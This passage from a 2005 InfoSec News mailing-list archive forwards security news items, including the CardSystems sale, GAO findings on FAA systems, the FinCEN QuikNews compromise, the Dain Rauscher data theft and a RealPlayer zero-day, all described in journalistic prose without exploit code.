Annual Computer Security Applications Conference (ACSAC) at http://www.acsac.org. I've been involved with ACSAC for many years. I think that this year's program offers practical solutions to cyber security problems. The conference is scheduled for December 5-9, 2005 at the Marriott University Park, Tucson, Arizona. We have a new and exciting format this year. On Monday, December 5 we have a special workshop on Malicious Software (Prevention and Defense) plus tutorials on application security training, Common Criteria version 3, trust management, and defense against malicious software. We have extended the length of the technical program to three full days to bring new momentum into the conference; we added two more sessions for peer-reviewed technical papers to accommodate the fact that we received a record number of high-quality submissions, and we revised the technical track review-process to ensure that we accept technical papers with high practical impact. This year we are offering more choices to attendees, while keeping tried and true features such as plenary talks, classic papers, works in progress, and panels: Tuesday-Thursday, December 6-8, we have forty-five peer reviewed papers on practical computer security; presentations of security case studies; a new type of session, called 'technology blitz' is designed to offer rapid-fire introductions to emerging and mature security technologies and their applications; classic papers on the foundations of computer security, including David Bell reprising his Bell-LaPadula model; works in progress -- quick updates on ongoing projects; and Distinguished Practitioner Brian Snow and Invited Essayist Mary Ellen Zurko. On Friday, December 9 we have tutorials on analysis of large scale network data, security policy modeling, securing web service applications, and mobile security issues. ACSAC has changed where its web page is hosted. We have to rebuild our postal and email lists. Even if you have signed up previous, please go to http:// www.acsac.org/list/ so that you can receive up-to-date information. Because we're rebuilding the lists, for a short while, you may receive more than one message about ACSAC. We apologize for the inconvenience. -=- You can help ACSAC reach people who might benefit from this information. Feel free to forward this message with a personal note to your friends and colleagues. They can sign up at the above URL. ACSAC is sponsored by Applied Computer Security Associates, a not-for-profit all-volunteer Maryland corporation. Our postal address is 2906 Covington Road, Silver Spring, MD 20910-1206. From isn at c4i.org Mon Sep 26 00:06:34 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:13:28 2005 Subject: [ISN] Troubled CardSystems to be sold Message-ID: http://www.networkworld.com/news/2005/092305-cardsystem.html By Robert McMillan IDG News Service 09/23/05 A Mountain View, Calif., electronic payment company plans to buy CardSystems, the transaction processing company which had data on 40 million customers compromised when hackers broke into its servers recently. On Friday, CyberSource announced that it has signed a letter of intent to acquire the CardSystems assets, a transaction that could close by year's end. The deal gives CyberSource an opportunity to expand into new areas beyond the e-commerce transaction services that have built the 175 person company, said Bruce Frymire, a company spokesman. "It brings a lot to CyberSource," he said. "It's a processing platform, which we have not had at this point. It also gives us retail point of sale processing." CardSystems is used by 120,000 merchants to process more than $18 billion worth of transactions annually, Frymire said. Online thieves were able to break into CardSystems' Tuscon, Ariz., operations center and steal credit card information from the company's servers. The intrusion, which was disclosed in June, was detected after fraudulent charges began appearing on some of the stolen accounts. CardSystems' CEO John Perry has since admitted that the stolen records were improperly kept, and his company's business has taken a hit following the disclosure. Both American Express and Visa U.S.A. have said that they intend to sever their relationship with CardSystems by the end of October. Whether or not the planned CyberSource acquisition will affect these defections may be a factor in the deal. "Certainly that would be a matter of serious interest to us," Frymire said of the impending departures. CardSystems and CyberSource are working to ensure that merchants experience no disruption of service, he added. CyberSource says the transaction is subject to further due diligence and may also be subject to regulatory approval. Frymire would not say how much CyberSource expected to pay for the privately held Atlanta company. From isn at c4i.org Tue Sep 27 02:10:15 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 27 02:36:27 2005 Subject: [ISN] FAA air-traffic systems lack cyberprotections, GAO finds Message-ID: Forwarded from: William Knowles http://www.gcn.com/vol1_no1/daily-updates/37127-1.html By Rob Thormeyer GCN Staff 09/26/05 Air-traffic control systems operated by the Federal Aviation Administration contain significant cybersecurity weaknesses and are vulnerable to attack, according to a recent report [1] from the Government Accountability Office. In the report, GAO concluded that the agency has not completely implemented information security programs that protect its systems from cyberattack. "FAA has made progress in implementing information security for its air traffic control systems by establishing an agencywide information security program and addressing many of its previously identified security weaknesses; however, it still has significant weaknesses that threaten the integrity, confidentiality and availability of its systems - including weaknesses in controls that are designed to prevent, limit and detect access to those systems," the report said. FAA officials admit the weaknesses exist, but contend that because parts of their systems are custom-built with older equipment, special-purpose operating systems and proprietary communication interfaces, chances for unauthorized access are limited, according to the report. "Nevertheless, the proprietary features of these systems do not protect them from attack by disgruntled current or former employees who understand these features, or from more sophisticated hackers," the report added. GAO recommended that the agency address the following weaknesses: outdated security plans, inadequate security awareness training, inadequate system testing and evaluation programs, limited security incident-detection capabilities and shortcomings in providing service continuity for disruptions in operations. In response, FAA officials said they will consider the recommendations, but also stated that the report is not indicative of the agency's security systems. Meanwhile, Rep. Tom Davis (R-Va.), who chairs the House Government Reform Committee that asked for the report, said FAA must address the recommendations. "Given the ever-evolving nature of cyberthreats and the thought of someone with malicious intent accessing FAA's IT systems, complacency is not an option," he said. [1] http://www.gao.gov/new.items/d05712.pdf *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ================================================================ C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Tue Sep 27 02:10:42 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 27 02:36:50 2005 Subject: [ISN] Oracle CEO Touts Security Plans Message-ID: Forwarded from: security curmudgeon : http://www.internetnews.com/bus-news/article.php/3550651 : : By David Needle : September 21, 2005 : He tweaked Microsoft's Bill Gates for once saying his company was going : to devote special focus to security for the month of February. "Our : first client was the CIA, and our second client was the National : Security Agency. That was 25 years ago. We've been working on security : since day one," said Ellison. He further claimed the last time an Oracle : database was broken into was 15 years ago, versus the 45 minutes he said : it took for someone to break into Microsoft's first version of its : Passport online ordering system. Well isn't this a doozy of a quote. This screams a) pure ignorance or b) very crafty wording designed to evade any criticism. "last time an Oracle database was broken into was 15 years ago, vs the 45 minutes he said it took for someone to break into Microsoft's first version of its Passport online ordering system." How do *you* read this quote? 1. Oracle database, as in their software, meaning installed anywhere 2. Oracle database, as in a database run by Oracle Corporation 3. Oracle database, as in a consumer service like MS Passport is (?!) 4. other? Depending on how you read this, the reply will obviously change. 1. Hacker logs onto FWP hunter database, but no information stolen http://www.bozemandailychronicle.com/articles/2005/06/29/news/02fwp.txt "Luckily, Aasheim said, the agency's databases use Oracle software, which compresses inforamtion into a code that is not visible to hackers as readable text." (Yes yes, horrible quote as far as the 'readable text' part, but still proves the point..) Further, not that DNS is necessarily proof, we all know that many places name machines based on the application it runs: http://www.zone-h.org/en/search/what=oracle/ 05/24/2005: http://oracle.usgovbank.us 05/02/2005: http://oracle.riverblues.co.za/~sacx/image/ath.htm 02/27/2005: http://www.oracle-on-linux.com 01/31/2005: http://entrysoft.oracle.priorweb.be 01/17/2005: http://oracle.rensreinders.nl 11/18/2004: http://campus.pincn.com/clientpages/2004/oracle/index.html 06/08/2004: http://www.oracle.worldzonepro.com 12/19/2003: http://oracle.mylxhq.com 12/14/2003: http://www.oracle-pa.com.br 12/04/2003: http://www.oracle.berndpross.de 10/21/2003: http://www.oracle-dba.fr.pl 11/08/2002: http://oracle.ssnet.co.jp 10/29/2002: http://oracle.4click.com.ua 10/23/2002: http://www.oracle.ksu.edu 07/18/2002: http://www.oracle.net 06/27/2002: http://oracle.net 06/27/2002: http://www.oracle.net 06/17/2002: http://www.oracle-ovation.com 04/23/2002: http://partner.oracle.co.kr 06/27/2001: http://www.oracle.au.edu 2. A database run by Oracle, not hacked in last 15 years (so it was hacked 15 years ago)? But this doesn't jibe given the wording above: "He further claimed the last time an Oracle database was broken into was 15 years ago, versus the 45 minutes he said it took for someone to break into Microsoft's first version of its Passport online ordering system. This wording implies Ellison is directly comparing an Oracle product to a Microsoft service? If so, he is comparing a database running on the Oracle network, protected by multiple layers of security (presumably), to a public facing, publicly accessable Microsoft service. Apples and oranges Ellison. 3. Comparing Oracle a product, to Microsoft Passport service? Apples and oranges Ellison. So, would anyone at Oracle like to back peddle and try to explain this comment? From isn at c4i.org Tue Sep 27 02:09:46 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 27 02:37:53 2005 Subject: [ISN] Information security standards highlighted after Tech Fest Message-ID: http://www.antiguasun.com/paper/?as=view&sun=100517108809262005&an=495409096609262005&ac=Local September 26 2005 Emerging from the excitement of the Tech Fest 2005 and in preparation for World Standards Day (WSD) on 14 Oct., the Antigua & Barbuda Bureau of Standards (ABBS) would like to highlight the following excerpt as a timely tool for the information society, in keeping with the 2005 WSD theme - "Standards for a safer world". For most business information, security may be essential to maintain competitive edge, cash flow, profitability, legal compliance and commercial image. But many businesses and most non-business organisations may hold information as their only asset. An absence of information security may threaten their integrity and therefore their very existence. The 2002 Computer Crime and Security Survey of 503 computer security practitioners in the United States (conducted by the Computer Security Institute with the participation of the San Francisco FBI Computer Intrusion Squad) indicated that the threat from computer crime and other information security breaches continues unabated - and that the financial toll is mounting. According to the survey's findings, 90 per cent of the respondents detected computer security breaches within 12 months covered by the survey, 80 per cent acknowledged financial losses due to computer breaches, and 46 per cent (223 respondents) reported their resulting financial losses as totalling, US$455,848,000. From isn at c4i.org Tue Sep 27 02:10:00 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 27 02:38:26 2005 Subject: [ISN] Password rule change tightens account security Message-ID: http://www.spectatornews.com/media/paper218/news/2005/09/26/CampusNews/Password.Rule.Change.Tightens.Account.Security-998087.shtml By Nathaniel Shuda September 26, 2005 With technology constantly evolving, regulating access to computer-related systems and services with passwords has become widespread. But if a person use a simple password, it could be very easy for someone to hack into his or her system, especially with the use of special programming software designed to seek out patterns in passwords, said Chip Eckardt of Learning and Technology Services. It is for this reason that LTS, along with the university, will require students and faculty to change their passwords to fit criteria that will make their accounts less susceptible to intrusion. The switch will begin Nov. 1. More hackers are surfacing all the time, and accounts already have been compromised in several cases because of easy access to computer accounts, Eckardt said. "We've even had Mac boxes get hacked," he said. "That's been real unusual because ... when you have something like Windows, (which) everybody goes after, it's a common target. But we're even seeing attacks in areas where we've never saw them before." The LTS office plans to send three reminder messages via e-mail to warn users of the change: one informing all university computer users of the change, as well as reminders 10 and three days before current passwords expire. Users who recently have changed their passwords will not have to perform the switch until their new passwords expire in a year, Eckardt said. Those who do not change their password by the time it expires will be prompted the next time they log in and won't be allowed to connect to the system without first changing their password. If users forget their passwords, Eckardt said, they can visit a Web site LTS will create to reset them. The new requirements, however, have some students worried about accessing the university's computer system. "I think it's a good idea, if you could remember your password," freshman Meghan Hamre said. "There's no way I could remember that kind of (password), especially eight (characters) long." Eckardt recommended using a password that has a personal meaning, but not something hackers could easily guess. He said Eau Claire's change precedes a possible UW System-wide password policy. "I know the UW System is looking at passing a statewide policy on this, and ours will comply with theirs, but their policy's probably not going to hit for another year," he said. "We're trying to be proactive." -=- Valid passwords will have to meet these minimum requirements: * Must be at least eight characters in length * Must contain characters from three of the following four categories: - English uppercase characters (A through Z) - English lowercase characters (a through z) - Base 10 digits (0 through 9) - Non-alphabetic characters (for example, $, # or %) * Cannot contain significant portions of the user's account name or full name From isn at c4i.org Tue Sep 27 02:11:05 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 27 02:38:59 2005 Subject: [ISN] Linux Security Week - September 26th 2005 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | September 26th, 2005 Volume 6, Number 40n | | | | Editorial Team: Dave Wreski dave@linuxsecurity.com | | Benjamin D. Thomas ben@linuxsecurity.com | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, perhaps the most interesting articles include "Protecting Linux against automated attackers," "Information Security Concepts Primer," and "Five common mistakes that Linux IT managers make." --- LINUX ADVISORY WATCH This week, advisories were released for turqstat, centericq, lm-sensors, kdebase, python, XFree86, Mailutils, Shorewall, mozilla, mod_ssl, clam, mod_ssl, Zebedee, umount, squid, and mod_ssl. The distributors include Debian, Fedora, Gentoo, and Red Hat. http://www.linuxsecurity.com/content/view/120434/150/ --- Hacks From Pax: PHP Web Application Security By: Pax Dickinson Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities. http://www.linuxsecurity.com/content/view/120043/49/ --- Network Server Monitoring With Nmap Portscanning, for the uninitiated, involves sending connection requests to a remote host to determine what ports are open for connections and possibly what services they are exporting. Portscanning is the first step a hacker will take when attempting to penetrate your system, so you should be preemptively scanning your own servers and networks to discover vulnerabilities before someone unfriendly gets there first. http://www.linuxsecurity.com/content/view/119864/150/ --- >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected. http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05 --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * Firefox woes spread to Linux 22nd, September, 2005 When I saw all the headlines this week about a new Symantec report contradicting popular perception that Firefox was the secure alternative to Microsoft Internet Explorer, the timing couldn't have been better. Just three days earlier I wrote this blog about Firefox surpassing Microsoft Internet Explorer in monthly vulnerabilities and a flood of angry comments followed in the talkback and Slashdot had another 500 plus comments. http://www.linuxsecurity.com/content/view/120427 * Cisco security certifications changing 20th, September, 2005 Cisco Systems Inc. is revamping its security professional-level certifications to better reflect the networking giant's emphasis on its Self-Defending Network strategy. http://www.linuxsecurity.com/content/view/120415 * Protecting Linux against automated attackers 22nd, September, 2005 As many systems administrators will tell you, attacks from automated login scripts specifically targeting common account names with weak passwords have become a substantial threat to system security, especially via SSH (a popular program that allows remote users to log in to a Linux computer and execute commands locally). Here are some common-sense rules to follow that can greatly improve security, as well as several scripts to cut down on the computing resources wasted by these attacks. http://www.linuxsecurity.com/content/view/120428 * Underground without firewalls 23rd, September, 2005 Deep underground somewhere in south-east England, security experts have built a data hosting center almost entirely based on open source operating systems. http://www.linuxsecurity.com/content/view/120436 * Novell strengthens its security products 20th, September, 2005 At Novell's Brainshare user conference in Barcelona last week, the software supplier said it had strengthened its identity and access management security products, Novell Identity & Access Management. http://www.linuxsecurity.com/content/view/120413 * EnGarde Secure Linux 3.0 PR1 21st, September, 2005 "Guardian Digital is shortly going to be announcing the next major release of its award-winning EnGarde Secure Linux platform, and we'd like to offer the engarde-users community a first-glimpse at this release. Within this new release, codenamed Rapier, you'll find: Linux 2.6 kernel featuring SELinux Mandatory Access Control; Guardian Digital Secure Network features free access to all system and security updates; support for new hardware, including 64-bit AMD architecture; web-based management of all functions...." http://www.linuxsecurity.com/content/view/120420 * Firefox Command Line URL Shell Command Injection 21st, September, 2005 Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in the URL provided via the command line. This can e.g. be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4). http://www.linuxsecurity.com/content/view/120423 * Auditor: The security tool collection 23rd, September, 2005 The Auditor security collection is a GPL-licensed live CD based on Knoppix, with more than 300 security software tools. Auditor gives you easy access to a broad range of tools in almost no time. http://www.linuxsecurity.com/content/view/120439 * Are IT Departments Security Risks? 19th, September, 2005 Workers are more like to indulge in risky Internet behavior -- surfing to unknown or even suspicious sites, for example -- when they have an IT department behind them to clean up their mess, a recently released study claims. http://www.linuxsecurity.com/content/view/120407 * Hackers thwart security by going small 19th, September, 2005 Computer attackers are trying to circumvent improved defences in corporate networks by creating smaller worms and viruses that infect individual computers, says a report on Internet security to be released today. http://www.linuxsecurity.com/content/view/120410 * ISS discusses its security procedures 20th, September, 2005 Internet Security Systems Chairman, CEO and President Tom Noonan says customers increasingly are looking for security platforms that do two basic things: Let the good guys in and keep the bad guys out. He spoke with Network World's Editor in Chief John Dix and News Editor Bob Brown. Here is an edited transcript of Noonan's thoughts on a host of topics. http://www.linuxsecurity.com/content/view/120414 * Passwords In Security 21st, September, 2005 Breaking into corporate networks, and thereby corporate information, has never been easier Why? Firstly, access to systems (usually Windows) at the desktop is universal. Secondly, most people, including techies, don't appear to know how to select adequately secure passwords. http://www.linuxsecurity.com/content/view/120421 * Viruses not just a Windows issue 21st, September, 2005 According to a report from antivirus company Kaspersky, Mozilla.org recently hosted Linux versions of the Mozilla browser and Thunderbird mail client that were infected with the Linux RST.b virus. The versions involved were the localised Korean releases, and they have now been removed. RST.b infects ELF executable files to insert a backdoor onto the victim's computer and automatically downloads exploit scripts from an Internet site. http://www.linuxsecurity.com/content/view/120424 * Information Security Concepts Primer 22nd, September, 2005 Information Security is such a broad discipline that it.s easy to get lost in a single area and lose perspective. The discipline covers everything from how high to build the fence outside your business, all the way to how to harden a Windows 2003 server. http://www.linuxsecurity.com/content/view/120431 * Five common mistakes that Linux IT managers make 23rd, September, 2005 After seeing the same mistakes repeated by different IT managers over the years, I've noticed a pattern of common errors. Here are the five common mistakes, along with tips for avoiding them. http://www.linuxsecurity.com/content/view/120437 * Name that worm plan looks to cut through chaos 23rd, September, 2005 Zotob.E, Tpbot-A, Rbot.CBQ and IRCbot.worm: all names given to a single worm that wreaked havoc in Windows 2000 systems last month. Among the plethora of identifiers, perhaps the most useful--CME-540--didn't make an impact. http://www.linuxsecurity.com/content/view/120438 * Protect Yourself Against Rogue Employees 20th, September, 2005 You have problems. The annual report spreadsheet has disappeared from a server. A virus is loose in company e-mail. Someone has access to the network through some kind of back door. Those are big problems. http://www.linuxsecurity.com/content/view/120416 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Tue Sep 27 02:09:33 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 27 02:41:19 2005 Subject: [ISN] Fortifying DOD's network defenses Message-ID: http://www.fcw.com/article90899-09-26-05 By Frank Tiboni Sept. 26, 2005 Defense Department officials can implement a mixture of technologies and procedures to fortify the department's computer networks, but real protection requires designing a new generation of systems and security tools, a leading computer scientist said. Eugene Spafford, a computer sciences professor at Purdue University who has testified before Congress on cybersecurity, questions whether it's possible to develop new systems without investing in long-term research. Attacks on DOD computer networks are on the rise as adversaries attempt to bypass the United States' formidable defenses and launch attacks from the inside out, experts say. Defending DOD's networks will require a combination of efforts, Spafford said. He outlined six steps DOD could take to strengthen the department's network defenses. They are: * Buying systems based on security features rather than cost. * Limiting access to systems. * Removing systems from networks unless those systems are absolutely necessary. * Restricting who can add hardware and software to networks. * Requiring proper training and supervision for network managers and computer users. * Establishing careful network-monitoring practices. But Spafford said incremental changes will not strengthen existing networks and a whole new approach is needed. "Unfortunately, the government is not funding much research in cybersecurity and almost none in long-range research," said Spafford, who is also executive director of Purdue's Center for Education and Research in Information Assurance and Security. He cited President Bush's decision in June to let the President's Information Technology Advisory Committee expire without reappointing current members or selecting new ones. Spafford said the threat to DOD networks is varied and complex. "In large part, the systems used are based on commercial products that were never written for high-security environments," he added. Spafford said misconfigured or misapplied patches create vulnerabilities that are exacerbated by having systems linked together. "It means that any weak point can be accessed from all sorts of places and can in turn reach out to damage lots of other military systems," he said. Clint Kreitner, president and chief executive officer of the Center for Internet Security, a nonprofit organization that helps government and industry officials better manage computer security risks, said DOD should limit access to certain networks. Alan Paller, director of research at the SANS Institute, said government and industry should avoid using new information assurance technologies that vendors claim are impervious to attacks. Instead, he said, they should anticipate new threats 18 months in advance and develop technologies and policies to address them. A Defense Information Systems Agency official said DOD relies on a sophisticated approach to information assurance. The official added that the department is changing how it builds systems by moving to a service-oriented architecture that will make IT services widely available on the network and improve data sharing governmentwide. "We are doing this in order to make more and better data available to more people in DOD and to our partners, and as a way of increasing our agility and our ability to innovate in the development of warfighting processes based on these services," the DISA official said. DOD also changed its approach to network operations. The official said the department has moved to a structure that puts the Joint Task Force-Global Network Operations in charge of operating, managing and defending DOD's information infrastructure, with organizations in the military services reporting to the joint task force. DOD relies on its global networks and IT to achieve its mission, and the country's adversaries recognize DOD's dependence on networks and electronic information, the DISA official said. "The DOD networks are very large," the official said. "So we have many challenges in synchronizing the many IT efforts and security for these across this vast infrastructure." From isn at c4i.org Wed Sep 28 00:47:18 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:53:23 2005 Subject: [ISN] SE Linux embarks on Common Criteria testing Message-ID: http://www.gcn.com/vol1_no1/daily-updates/37131-1.html By Joab Jackson GCN Staff 09/27/05 The National Security Agency's Security Enhanced Linux [1] has started to undergo Common Criteria evaluation. Earlier this month, IBM Corp. submitted Red Hat Enterprise Linux v.5 (RHEL 5) - which includes the SE Linux module - for Evaluation Assurance Level 4. With the evaluation in place, this version of Linux, available from Red Hat Inc. of Raleigh, N.C., in late 2006, could offer another trusted operating system for handling sensitive information. Traditionally, Sun Microsystems Inc.'s Trusted Solaris operating system has dominated this market. "This allows our traditional customer base to look at Linux as a viable alternative," said Ed Hammersla, chief operating officer of Trusted Computer Solutions Inc. of Herndon, Va. Trusted Computer has developed some of the extensions to SE Linux that were incorporated into RHEL 5. Atsec Information Security of Austin, Texas, is evaluating RHEL 5 on a number of IBM servers, including the xSeries, pSeries and zSeries mainframes, as well as IBM blade servers. IBM announced earlier this year that it would submit [2] SE Linux to the National Information Assurance Partnership's Common Criteria Evaluation and Validation Scheme. SE Linux is a set of software controls that can be used with Linux to confine the actions of any process to a predetermined set of options, allowing for a far finer grained policy-based management of applications than operating systems offer. "We're moving away from discretionary access control, so the permissions for usage are out of the hands of users and rogue programs," said Paul Smith, head of Red Hat's government office. SE Linux lays the groundwork for Trusted Computer Systems' Application Suite, for instance, which permits a single computer to run multiple security levels. This multilevel security approach eliminates the need to keep multiple computers at a single desktop, each for a different security level. Hammersla noted that because RHEL 5 is under evaluation, agencies can use it to fulfill NSTISSP No. 11 National Policy, which calls for the use [3] of Common Criteria-certified products to be used on networks that carry sensitive information. Although Red Hat won't officially release RHEL 5 until late next year, users can test early implementations available [4] through the Fedora Linux distribution, a volunteer effort that packages beta issues of the Red Hat Enterprise Linux. Purchasers of Trusted Computer Systems' Application Suite can also get the operating system, since it is included in that software package as well. [1] http://www.nsa.gov/selinux/ [2] http://www.gcn.com/24_8/tech-report/35516-1.html [3] http://www.gcn.com/21_31/news/20302-1.html [4] http://www.fedoracore.org/ From isn at c4i.org Wed Sep 28 00:47:47 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:54:21 2005 Subject: [ISN] FinCEN Web Site Compromised Message-ID: http://www.securitiesindustry.com/article.cfm?articleid=16211 By John Sandman Standards Editor September 27, 2005 The Financial Crimes Enforcement Network's (FinCEN) QuikNews Web site was hacked last week. The identity and location of those responsible have yet to be determined. The Treasury Department agency, responsible for enforcing regulations against money laundering and terrorist financing, responded by closing down the news site. A mass e-mail went out from the FinCEN QuikNews address last Friday that contained two photos, one showing a street in what appeared to be a Middle Eastern town or city with a large pool of blood. The other was of a purported Iraqi child lying in what appeared to be a hospital bed next to a woman dressed in a chador. Above the photos was the caption: "take back your monsters (army)/you killed my father and mother/what you want???/ i know (oil) [sic]." The e-mail, which carried the apparently legitimate FinCEN QuikNews return address, was time-stamped at 10:02 Friday morning, a day before an anti-war demonstration in Washington. No one from FinCEN commented on any possible link between the demonstration and the timing of the security breach, or the fact that a Treasury Department official was speaking on terrorist financing and money laundering at a conference in Washington, D.C. when the breach occurred. At 10:25 FinCEN sent its own message: "You may have received a message this morning which appeared to originate from FinCEN's QuickNews system. This message was not sent by FinCEN and we are currently investigating its origins." A second message, which described QuikNews as a subscriber-based e-mail service that is hosted externally and is separate from FinCEN's main Web-based operations, said QuikNews, "appears to have been compromised this morning. We are investigating this incident." Because the compromised system is "outside FinCEN's security perimeter and is not connected to other FinCEN systems," the message continued, "Bank Secrecy Act data and all other sensitive information maintained by FinCEN was in no way, shape or form compromised by this incident." As of 5:00 p.m. the site was shut down permanently and FinCEN said it planned to reinstitute a notification service without reusing the same mailing list. FinCEN contacted law enforcement agencies, but spokesperson Anne Marie Kelly did not identify which ones. Data security has long been a preoccupation of the securities industry, even before the attacks on New York and Washington, D.C. on Sept. 11, 2001. The House Government Reform Subcommittee on Management, Finance and Accountability is holding hearings on the subject this week, with Nasdaq CIO Steve Randich expected to testify. The timing of the FinCEN incident was made more awkward by a Sept. 23 speech that was being given at a World Bank-IMF program in Washington, D.C. by Daniel L. Glaser, acting assistant secretary of terrorist financing and financial crimes at the Treasury. "The international financial system is only as strong as its weakest link," Glaser stated during his panel, which was assembled to bring together policy makers and regulators that were building effective anti-money-laundering and -terrorist-financing systems. "Financial centers that are susceptible to abuse provide terrorists and criminals with access to the international financial system as a whole. Therefore, efforts to combat terrorist financing must be uniform and global. Laxity in just a few jurisdictions undermines the efforts made by the rest." From isn at c4i.org Wed Sep 28 00:48:00 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:54:51 2005 Subject: [ISN] Tax breaks for cybersecurity firms? Message-ID: http://beta.news.com.com/Tax+breaks+for+cybersecurity+firms/2100-7348_3-5884149.html By Anne Broache Staff Writer, CNET News.com September 27, 2005 WASHINGTON -- Congress may offer tax breaks to companies that adopt good cybersecurity standards, the chairman of a House of Representatives subcommittee said Tuesday. But in legislating cybersecurity guidelines, lawmakers should avoid heavy-handed regulations, Rep. Dan Lungren, a California Republican, said in a lunch speech here. "My fear is if we do that, we'll stifle innovation," he said. "How can we predict what the best way will be (to manage cybersecurity) in most of these instances?" Lungren said the U.S. House of Representatives cybersecurity subcommittee, which he chairs, is working on crafting an "overall view of ways we can work with the private sector" to develop cybersecurity tools, including the possibility of creating an incentive-based system. Lawmakers also plan to address liability concerns, he said, as they want to allow companies to take some risks in coming up with new cybersecurity tools without having to worry about being sued if they fall short. Andy Purdy, acting director of the Department of Homeland Security's National Cybersecurity Division, said in a speech that his agency is also working closely with the private sector to equip itself for responding to cyberattacks. Purdy said he expects Homeland Security Secretary Michael Chertoff to announce "in the near future" the appointment of an assistant secretary for cybersecurity and telecommunications--a position approved by Congress during the spring. That official would be in charge of coordinating cybersecurity efforts among different agencies and research groups, Purdy said. The agency, which has already flunked a cybersecurity preparedness test, is also gearing up for a November exercise, dubbed Cyberstorm, intended to give the government a chance to role-play its way through a mock cyberattack. From isn at c4i.org Wed Sep 28 00:48:13 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:55:24 2005 Subject: [ISN] FBI checking theft of Dain clients' data Message-ID: http://www.startribune.com/stories/535/5638740.html Thomas Lee Star Tribune September 28, 2005 The FBI has opened an investigation into the possible theft of personal information about some clients of RBC Dain Rauscher Inc. The chief executive of the Minneapolis-based brokerage firm disclosed the problem in a letter sent to 300,000 households. Dain Rauscher has not yet detected any fraudulent activity in their accounts, according to the letter from Dain head John Taft. "While we have no information to believe that your personal information has been compromised in any way, we are treating this as a serious situation," Taft wrote. FBI agent Paul McCabe said the agency does not know how many accounts might be affected. Dan Callahan, a Dain Rauscher spokesman, said some clients have received anonymous letters sent last week by someone claiming to be a former Dain employee. The letter, received by a seemingly random group of more than 100 account holders, contained each recipient's name, address, tax identification number, birthdate and Dain Rauscher account number. The Star Tribune obtained a copy of the profanity-laced letter, whose author said he was seeking revenge on Dain Rauscher because the company fired him. The writer claims to have been able to copy information from "thousands" of accounts because Dain Rauscher did not remove his password from a mainframe computer. He claims to have sold the information to an unidentified buyer. "It is Dain Rauscher's [mistake] that I did this so blame them," the letter says. "Call a TV station, ask them to call Dain and find out how the idiots are going to fix this." Callahan said the company, which like other brokerage houses has experienced heavy turnover in recent years, routinely changes passwords when an employee leaves the firm. Nevertheless, Dain is reviewing its security procedures and has hired an outside firm that specializes in identity theft. "We are a victim, just like our clients," Callahan said. "We take their protection very seriously." The company is asking people who receive the letter to contact Dain immediately. Callahan said that customers should place the letter in a plastic bag because it might contain fingerprints. The company is turning the letters over to the FBI. McCabe declined to comment further except to say that the FBI is "vigorously" pursuing the case. The incident is the latest case involving the potential theft of personal information from financial institutions such as banks and credit-card companies. In February, MasterCard International Inc. said a computer hacker may have accessed personal information of as many as 40 million credit card holders. And late last year, Wells Fargo & Co. said four laptop computers were stolen from an Atlanta company that prints loan statements. The computers contained names, addresses and Social Security numbers of an undisclosed number of customers who have mortgages and student loans with the bank. Copyright 2005 Star Tribune. All rights reserved. From isn at c4i.org Wed Sep 28 00:46:40 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:56:09 2005 Subject: [ISN] Zero-Day Exploit Exposes RealPlayer Users to Attack Message-ID: http://www.eweek.com/article2/0,1895,1864076,00.asp By Ryan Naraine September 27, 2005 An independent security researcher on Tuesday posted an advisory - with zero-day exploit code?for a potentially dangerous security hole in media players marketed by RealNetworks Inc. The vulnerability, which remains unpatched, has been confirmed in RealPlayer version 10.0.5.756 (gold) and affects only the Linux/Unix platforms. Security alerts aggregator Secunia Inc. rates the bug as "highly critical" and warned that a malicious hacker could run a successful exploit to take complete control of a vulnerable machine. The vulnerability was discovered and reported to RealNetworks by a researcher known simply as "c0ntex." In a warning posted to the Open-Security Web site, the researcher described the issue as a "remotely exploitable format string vulnerability" that allows an attacker to "execute a remote shell under the permissions of the user running the media player." He said the bug affects all versions of RealPlayer and Helix Player (Unix and Linux) and can be exploited by manipulating media files, including ".rp" (RealPix) and ".rt" (RealText) file formats. In the advisory, "c0ntex" provides a detailed explanation of the flaw and code that can be used to launch an attack. The exploit code was reproduced at FrSIRT (French Security Incident Response Team), a Web site that is widely used by underground hackers. "To exploit this remotely, [an attacker] just needs to place the created file on a Web site and provide a link so users can click the file, launching RealPlayer and exploiting the vulnerability," he added. Software vendors, including big names like Microsoft Corp. and Oracle Corp., have sharply 